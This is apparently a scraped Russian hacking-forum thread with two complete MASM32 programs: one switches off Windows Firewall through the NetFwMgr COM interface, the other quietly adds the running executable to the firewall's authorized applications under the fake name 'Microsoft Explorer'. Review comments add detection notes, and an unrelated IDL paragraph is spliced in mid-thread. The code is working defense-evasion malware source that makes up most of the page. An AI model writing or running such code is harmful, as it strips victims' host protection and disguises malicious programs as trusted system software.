;-----------------------------------------------------------------------
; MASM32 program (32-bit x86, flat model, stdcall).
; Purpose: switches the Windows Firewall off for the current profile by
;          driving the firewall manager through late-bound COM
;          automation (IDispatch): NetFwMgr -> LocalPolicy ->
;          CurrentProfile, then FirewallEnabled := VARIANT_FALSE.
;
; Defender view: code that instantiates CLSID_NetFwMgr and clears
; FirewallEnabled is a host-defense impairment pattern (MITRE ATT&CK
; T1562.004). The write normally needs administrative rights. On Vista
; and later it typically surfaces as a firewall-setting-changed audit
; event (Security 4950 / Firewall operational log 2003), and on any
; version as a change under
; HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy.
;
; NOTE(review): the coinvoke macro and oaidl.inc are not shown on this
; page; comments about them describe how they are used here, not how
; they are implemented.
;-----------------------------------------------------------------------
.586
.model flat, stdcall
option casemap :none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc
includelib \masm32\lib\ole32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
include oaidl.inc

PutProperty proto :dword, :dword, :dword
GetProperty proto :dword, :dword, :dword

; unicode page, <string>, zero
; Emits each character of <string> as a byte followed by the byte `page`
; (0 here, which yields a UTF-16LE string), then, when the third
; argument is not blank, a terminating word with that value.
unicode macro page,string,zero
    irpc c,<string>
        db '&c', page
    endm
    ifnb <zero>
        dw zero
    endif
endm

.data
IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>>
; Class and interface identifiers of the firewall manager object.
CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>>
IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>>
vVal VARIANT <>                         ; value passed to PutProperty
VarResult VARIANT <>                    ; receives GetProperty results
fwMgr dd ?                              ; firewall manager interface pointer
fwPolicy dd ?                           ; LocalPolicy pointer, later overwritten (see start)
m_pFireWallProfile dd ?                 ; CurrentProfile pointer

.code
; Property names as wide strings; they are placed in the code section
; because they follow the .code directive.
wszLocalPolicy: unicode 0, <LocalPolicy>,0
wszCurrentProfile: unicode 0, <CurrentProfile>,0
wszFirewallEnabled: unicode 0, <FirewallEnabled>,0

;-----------------------------------------------------------------------
; start - program entry point.
; NOTE(review): none of the values returned in eax by CoCreateInstance,
; GetProperty or PutProperty is checked before the next step runs.
;-----------------------------------------------------------------------
start:
    invoke OleInitialize, 0
    invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr
    invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult
    mov eax, VarResult.ppdispVal        ; pointer slot of the returned VARIANT
                                        ; (presumably the same union storage as pdispVal - confirm in oaidl.inc)
    mov fwPolicy, eax                   ; fwPolicy = LocalPolicy object
    invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult
    mov eax, VarResult.ppdispVal
    mov fwPolicy, eax                   ; overwrites the LocalPolicy pointer with the profile pointer
    mov m_pFireWallProfile, eax
    mov vVal.vt, VT_BOOL
    mov vVal.boolVal, VARIANT_FALSE     ; FirewallEnabled := FALSE, i.e. firewall off
    invoke PutProperty, m_pFireWallProfile, offset wszFirewallEnabled, addr vVal
    ; NOTE(review): m_pFireWallProfile and fwPolicy hold the same pointer
    ; here, so the profile is released twice and the LocalPolicy object
    ; obtained first is never released.
    coinvoke m_pFireWallProfile, IDispatch, Release
    coinvoke fwPolicy, IDispatch, Release
    coinvoke fwMgr, IDispatch, Release
    invoke ExitProcess, 0
;###############################################################
;-----------------------------------------------------------------------
; PutProperty - late-bound property write through IDispatch.
; In:   _This    = IDispatch pointer of the target object
;       pUniName = pointer to the wide-character property name
;       pAgmnt   = pointer to the VARIANT holding the new value
; Out:  eax = 80004003h (E_POINTER) when _This or pAgmnt is null,
;             otherwise the result of the last COM call that was made
;             (0 if the type test below skipped both Invoke calls)
;-----------------------------------------------------------------------
PutProperty proc _This:dword, pUniName:dword, pAgmnt:dword
    LOCAL pArm : DISPPARAMS
    LOCAL var_8 : dword
    LOCAL dispIdMember : dword
    mov eax, 80004003h                  ; default result: E_POINTER
    .if _This != 0 && pAgmnt != 0
        mov var_8, 0FFFFFFFDh           ; -3 = DISPID_PROPERTYPUT, the named argument of a property put
        mov eax, pAgmnt
        mov pArm.rgvarg, eax            ; one argument: the caller's VARIANT
        lea eax, var_8
        mov pArm.rgdispidNamedArgs, eax
        mov pArm.cArgs, 1
        mov pArm.cNamedArgs, 1
        ; addr pUniName is the address of the parameter slot, which serves
        ; as a one-element array of name pointers (cNames = 1).
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        .if eax == 0
            mov ecx, pAgmnt
            mov cx, (VARIANT ptr [ecx]).vt
            xor eax, eax                ; eax = 0 so the fallback below is skipped when no call is made
            ; True for every type that does not have both VT_ARRAY and
            ; VT_BYREF set, so the put-by-reference attempt is made for
            ; almost any VARIANT.
            .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF)
                coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0
            .endif
            ; Fall back to a plain property put when the first attempt failed.
            .if eax != 0
                coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0
            .endif
        .endif
    .endif
    ret
PutProperty endp
;###############################################################
;-----------------------------------------------------------------------
; GetProperty - late-bound property read through IDispatch.
; In:   _This    = IDispatch pointer of the target object
;       pUniName = pointer to the wide-character property name
;       pOutArg  = pointer to the VARIANT that receives the value
;                  (not checked for null in this version)
; Out:  eax = 80004003h (E_POINTER) when _This is null, otherwise the
;             result of GetIDsOfNames or, if that succeeded, of Invoke
;-----------------------------------------------------------------------
GetProperty proc _This:dword, pUniName:dword, pOutArg:dword
    LOCAL dispIdMember : dword
    LOCAL pArm : DISPPARAMS
    ; A property get passes no arguments.
    mov pArm.rgvarg, 0
    mov pArm.rgdispidNamedArgs, 0
    mov pArm.cArgs, 0
    mov pArm.cNamedArgs, 0
    mov eax, 80004003h                  ; default result: E_POINTER
    .if _This != 0
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        .if eax == 0
            coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0
        .endif
    .endif
    ret
GetProperty endp
;###############################################################
end start
The Interface Definition Language (IDL) File. An IDL file contains one or more interface definitions. Each interface definition is composed of an interface header and an interface body. The interface header is demarcated by square brackets. The interface body is contained in curly brackets. This is illustrated in the following example interface:
Corleone Зделай без ком объектов вот это. Если WinXPSP2Firewall включен, то добавляет себя в список програм.
;------------------------------------------
;-----------------------------------------------------------------------
; MASM32 program (32-bit x86, flat model, stdcall).
; Purpose: when the Windows Firewall is enabled for the current profile,
;          adds the running executable to the profile's
;          AuthorizedApplications collection, using late-bound COM
;          automation (IDispatch) on NetFwMgr and
;          NetFwAuthorizedApplication.
;
; Defender view: the entry is registered under the display name
; "Microsoft Explorer" (wszFireWallTest) while the image path is
; whatever GetModuleFileNameW returns for the current process. An
; authorized-application entry whose name does not match its image path
; or signer is therefore worth alerting on (firewall exception tampering,
; MITRE ATT&CK T1562.004, combined with a masquerading name). Such
; entries are stored under
; HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\<profile>\AuthorizedApplications\List
; and on Vista and later an added exception is typically audited
; (Security 4946 / Firewall operational log 2004).
;
; NOTE(review): the coinvoke macro and oaidl.inc are not shown on this
; page; comments about them describe how they are used here, not how
; they are implemented.
;-----------------------------------------------------------------------
.586
.model flat, stdcall
option casemap :none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc
include \masm32\include\Oleaut32.inc
includelib \masm32\lib\ole32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\Oleaut32.lib
include oaidl.inc

Initialize proto :dword
Uninitialize proto :dword
; TurnOffWindowsFirewall / TurnOnWindowsFirewall are declared here but
; no definition of them appears in this listing.
TurnOffWindowsFirewall proto
TurnOnWindowsFirewall proto
AddApplication proto :dword, :dword, :dword
IsWindowsFirewallOn proto :dword, :dword
PutProperty proto :dword, :dword, :dword
GetProperty proto :dword, :dword, :dword
CallMethod proto :dword, :dword, :dword, :dword, :dword

; unicode page, <string>, zero
; Emits each character of <string> as a byte followed by the byte `page`
; (0 here, which yields a UTF-16LE string), then, when the third
; argument is not blank, a terminating word with that value.
unicode macro page,string,zero
    irpc c,<string>
        db '&c', page
    endm
    ifnb <zero>
        dw zero
    endif
endm

.data
IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>>
; Class and interface identifiers of the authorized-application object
; and of the firewall manager object.
CLSID_NetFwAuthorizedApplication GUID <0EC9846B3h, 02762h, 04A6Bh, <0A2h, 014h, 06Ah, 0CBh, 060h, 034h, 062h, 0D2h>>
IID_INetFwAuthorizedApplication GUID <0B5E64FFAh, 0C2C5h, 0444Eh, <0A3h, 001h, 0FBh, 05Eh, 000h, 001h, 080h, 050h>>
CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>>
IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>>

.code
; Property and method names as wide strings; they are placed in the code
; section because they follow the .code directive.
wszLocalPolicy: unicode 0, <LocalPolicy>,0
wszCurrentProfile: unicode 0, <CurrentProfile>,0
wszFirewallEnabled: unicode 0, <FirewallEnabled>,0
wszName: unicode 0, <Name>,0
wszAdd: unicode 0, <Add>,0
wszEnabled: unicode 0, <Enabled>,0                      ; not referenced in this listing
wszAuthorizedApplications: unicode 0, <AuthorizedApplications>,0
wszProcessImageFileName: unicode 0, <ProcessImageFileName>,0
wszFireWallTest: unicode 0, <Microsoft Explorer>,0      ; display name given to the new entry

; Program entry point.
start:
    call WinFaerFix
    invoke ExitProcess, 0
;###############################################################
;-----------------------------------------------------------------------
; WinFaerFix - top-level routine: obtains the current firewall profile,
; and if the firewall reports enabled, registers this executable as an
; authorized application.
; Out:  eax = result of the last call made (not used by the caller)
;-----------------------------------------------------------------------
WinFaerFix proc uses edi esi ebx
    LOCAL WfProfil : dword
    LOCAL wszMofd[500] : byte
    LOCAL bWfon : dword
    invoke OleInitialize, 0
    invoke Initialize, addr WfProfil
    .if eax == 0
        invoke IsWindowsFirewallOn, WfProfil, addr bWfon
        .if eax == 0 && bWfon == VARIANT_TRUE
            ; NOTE(review): wszMofd is 500 bytes, but the size argument of
            ; GetModuleFileNameW is counted in wide characters, so the call
            ; is allowed to write up to 1000 bytes into this stack buffer.
            invoke GetModuleFileNameW, 0, addr wszMofd, 500
            invoke AddApplication, WfProfil, addr wszMofd, addr wszFireWallTest
        .endif
        invoke Uninitialize, WfProfil
    .endif
    ret
WinFaerFix endp
;##########################################################
;-----------------------------------------------------------------------
; IsWindowsFirewallOn - reads the FirewallEnabled property of a profile.
; In:   wfprf = IDispatch pointer of the profile object
;       wfbol = pointer to a dword that receives the value
; Out:  eax = result of GetProperty; *wfbol is written only when it is 0
;-----------------------------------------------------------------------
IsWindowsFirewallOn proc uses edi esi ebx wfprf:dword, wfbol:dword
    LOCAL VarResult : VARIANT
    invoke GetProperty, wfprf, offset wszFirewallEnabled, addr VarResult
    .if eax == 0
        mov ecx, wfbol
        movzx edx, VarResult.boolVal    ; zero-extend the 16-bit boolean to a dword
        mov [ecx], edx
    .endif
    ret
IsWindowsFirewallOn endp
;##########################################################
;-----------------------------------------------------------------------
; AddApplication - creates an authorized-application object, sets its
; ProcessImageFileName and Name properties and passes it to the Add
; method of the profile's AuthorizedApplications collection.
; In:   wfprf                    = IDispatch pointer of the profile
;       lpszProcessImageFileName = wide string, path of the executable
;       lpszRegisterName         = wide string, display name of the entry
; Out:  eax = result of the last step that ran (0 on success)
; NOTE(review): the values returned by SysAllocString are not checked,
; and pFWApps is released only on the path where CoCreateInstance
; succeeded.
;-----------------------------------------------------------------------
AddApplication proc uses edi esi ebx wfprf:dword, lpszProcessImageFileName:dword, lpszRegisterName:dword
    LOCAL bAppEnable : dword
    LOCAL VarResult : VARIANT
    LOCAL bstrProcFileName : dword
    LOCAL vVal : VARIANT
    LOCAL bstrRegisterName : dword
    LOCAL pFWApp : dword
    LOCAL pFWApps : dword
    LOCAL result : dword
    invoke GetProperty, wfprf, offset wszAuthorizedApplications, addr VarResult
    mov result, eax
    .if eax == 0
        mov eax, VarResult.ppdispVal    ; pointer slot of the returned VARIANT
                                        ; (presumably the same union storage as pdispVal - confirm in oaidl.inc)
        mov pFWApps, eax                ; pFWApps = AuthorizedApplications collection
        invoke CoCreateInstance, addr CLSID_NetFwAuthorizedApplication, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwAuthorizedApplication, addr pFWApp
        mov result, eax
        .if eax == 0
            ; ProcessImageFileName := copy of the caller's path as a BSTR
            invoke SysAllocString, lpszProcessImageFileName
            mov bstrProcFileName, eax
            mov eax, bstrProcFileName
            mov vVal.vt, VT_BSTR
            mov vVal.pbstrVal, eax
            invoke PutProperty, pFWApp, offset wszProcessImageFileName, addr vVal
            mov result, eax
            .if eax == 0
                ; Name := copy of the caller's display name as a BSTR
                invoke SysAllocString, lpszRegisterName
                mov bstrRegisterName, eax
                mov eax, bstrRegisterName
                mov vVal.vt, VT_BSTR
                mov vVal.pbstrVal, eax
                invoke PutProperty, pFWApp, offset wszName, addr vVal
                mov result, eax
                .if eax == 0
                    ; collection.Add(application object)
                    mov vVal.vt, VT_DISPATCH
                    mov eax, pFWApp
                    mov vVal.pdispVal, eax
                    invoke CallMethod, pFWApps, offset wszAdd, addr VarResult, 1, addr vVal
                    mov result, eax
                .endif
                invoke SysFreeString, bstrRegisterName
            .endif
            invoke SysFreeString, bstrProcFileName
            .if( pFWApp )
                coinvoke pFWApp, IDispatch, Release
            .endif
            .if( pFWApps )
                coinvoke pFWApps, IDispatch, Release
            .endif
        .endif
    .endif
    mov eax, result
    ret
AddApplication endp
;##########################################################
; Uninitialize - releases the profile pointer obtained by Initialize.
; In:   wfprf = IDispatch pointer of the profile object
Uninitialize proc uses edi esi ebx wfprf:dword
    coinvoke wfprf, IDispatch, Release
    ret
Uninitialize endp
;###############################################################
;-----------------------------------------------------------------------
; Initialize - creates the firewall manager and walks
; LocalPolicy -> CurrentProfile.
; In:   pwfprf = pointer to a dword that receives the profile pointer
; Out:  eax = 0 on success, otherwise the result of the failing step
; NOTE(review): fwPolicy is released only inside the innermost success
; branch, so it is not released when reading CurrentProfile fails.
;-----------------------------------------------------------------------
Initialize proc uses edi esi ebx pwfprf:dword
    LOCAL fwPolicy : dword
    LOCAL fwMgr : dword
    LOCAL VarResult : VARIANT
    LOCAL result : dword
    invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr
    mov result, eax
    .if eax == 0
        invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult
        mov result, eax
        .if eax == 0
            mov eax, VarResult.ppdispVal
            mov fwPolicy, eax
            invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult
            mov result, eax
            .if eax == 0
                mov eax, VarResult.ppdispVal
                mov ecx, pwfprf
                mov [ecx], eax          ; hand the profile pointer to the caller
                mov result, 0
                coinvoke fwPolicy, IDispatch, Release
            .endif
        .endif
        coinvoke fwMgr, IDispatch, Release
    .endif
    mov eax, result
    ret
Initialize endp
;###############################################################
;-----------------------------------------------------------------------
; PutProperty - late-bound property write through IDispatch.
; In:   _This    = IDispatch pointer of the target object
;       pUniName = pointer to the wide-character property name
;       pAgmnt   = pointer to the VARIANT holding the new value
; Out:  eax = 80004003h (E_POINTER) when _This or pAgmnt is null,
;             otherwise the result of the last COM call that was made
;             (0 if the type test below skipped both Invoke calls)
;-----------------------------------------------------------------------
PutProperty proc uses edi esi ebx _This:dword, pUniName:dword, pAgmnt:dword
    LOCAL pArm : DISPPARAMS
    LOCAL NamArg : dword
    LOCAL dispIdMember : dword
    mov eax, 80004003h                  ; default result: E_POINTER
    .if _This != 0 && pAgmnt != 0
        mov NamArg, 0FFFFFFFDh          ; -3 = DISPID_PROPERTYPUT, the named argument of a property put
        mov eax, pAgmnt
        mov pArm.rgvarg, eax            ; one argument: the caller's VARIANT
        lea eax, NamArg
        mov pArm.rgdispidNamedArgs, eax
        mov pArm.cArgs, 1
        mov pArm.cNamedArgs, 1
        ; addr pUniName is the address of the parameter slot, which serves
        ; as a one-element array of name pointers (cNames = 1).
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        .if eax == 0
            mov ecx, pAgmnt
            mov cx, (VARIANT ptr [ecx]).vt
            xor eax, eax                ; eax = 0 so the fallback below is skipped when no call is made
            ; True for every type that does not have both VT_ARRAY and
            ; VT_BYREF set, so the put-by-reference attempt is made for
            ; almost any VARIANT.
            .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF)
                coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0
            .endif
            ; Fall back to a plain property put when the first attempt failed.
            .if eax != 0
                coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0
            .endif
        .endif
    .endif
    ret
PutProperty endp
;###############################################################
;-----------------------------------------------------------------------
; GetProperty - late-bound property read through IDispatch.
; In:   _This    = IDispatch pointer of the target object
;       pUniName = pointer to the wide-character property name
;       pOutArg  = pointer to the VARIANT that receives the value
; Out:  eax = 80004003h (E_POINTER) when _This or pOutArg is null,
;             otherwise the result of GetIDsOfNames or, if that
;             succeeded, of Invoke
;-----------------------------------------------------------------------
GetProperty proc uses edi esi ebx _This:dword, pUniName:dword, pOutArg:dword
    LOCAL dispIdMember : dword
    LOCAL pArm : DISPPARAMS
    ; A property get passes no arguments.
    mov pArm.rgvarg, 0
    mov pArm.rgdispidNamedArgs, 0
    mov pArm.cArgs, 0
    mov pArm.cNamedArgs, 0
    mov eax, 80004003h                  ; default result: E_POINTER
    .if _This != 0 && pOutArg != 0
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        .if eax == 0
            coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0
        .endif
    .endif
    ret
GetProperty endp
;###############################################################
;-----------------------------------------------------------------------
; CallMethod - late-bound method call through IDispatch.
; In:   _This     = IDispatch pointer of the target object
;       MetName   = pointer to the wide-character method name
;       VarRes    = pointer to the VARIANT that receives the result
;       numArg    = number of arguments in pArgArray
;       pArgArray = pointer to the VARIANT argument array
; Out:  eax = 80004003h (E_POINTER) when _This or VarRes is null,
;             otherwise the result of the last COM call that was made
;-----------------------------------------------------------------------
CallMethod proc uses edi esi ebx _This:dword, MetName:dword, VarRes:dword, numArg:dword, pArgArray:dword
    LOCAL pArm : DISPPARAMS
    LOCAL dispIdMember : dword
    mov eax, pArgArray
    mov pArm.rgvarg, eax
    mov eax, numArg
    mov pArm.cArgs, eax
    mov pArm.rgdispidNamedArgs, 0       ; positional arguments only
    mov pArm.cNamedArgs, 0
    mov eax, 80004003h                  ; default result: E_POINTER
    .if _This != 0 && VarRes != 0
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr MetName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        .if eax == 0
            coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, addr pArm, VarRes, 0, 0
            ; Retry with the put-by-reference flag added when the plain
            ; method call failed.
            .if eax != 0
                coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, VarRes, 0, 0
            .endif
        .endif
    .endif
    ret
CallMethod endp
;##########################################################
end start
Аноним Я не пойму сложности вопроса отключения стандартного фаера. Пример приводить не буду, т.к. кое-где сам юзаю, но лишь скажу, что без проверок на ошибки в асме он занимает 5 строк, никаких ком-объектов, драйверов и манипуляций с памятью не проводится, смотрите проще!
дело не в сложности, а в адекватности. На разговор - отвечаем разговором. На пример - примером. Если на пример отвечаем разговором - это и есть "нимдеть - это не камушки ворочать". типа прибить процесс это большой секрет
Hey,Аноним
;---------------------------------------------------------
; Declares a prototype type with no parameters and a pointer type to it,
; named after IDispatch::Release.
; NOTE(review): presumably the pair of typedefs the coinvoke macro used
; in the listings above needs for a vtable call; coinvoke is not defined
; on this page, so whether its expansion expects an explicit `this`
; parameter in the prototype cannot be confirmed from here.
IDispatch_ReleaseProto typedef proto
IDispatch_Release typedef ptr IDispatch_ReleaseProto
;---------------------------------------------------------
could it pass ML?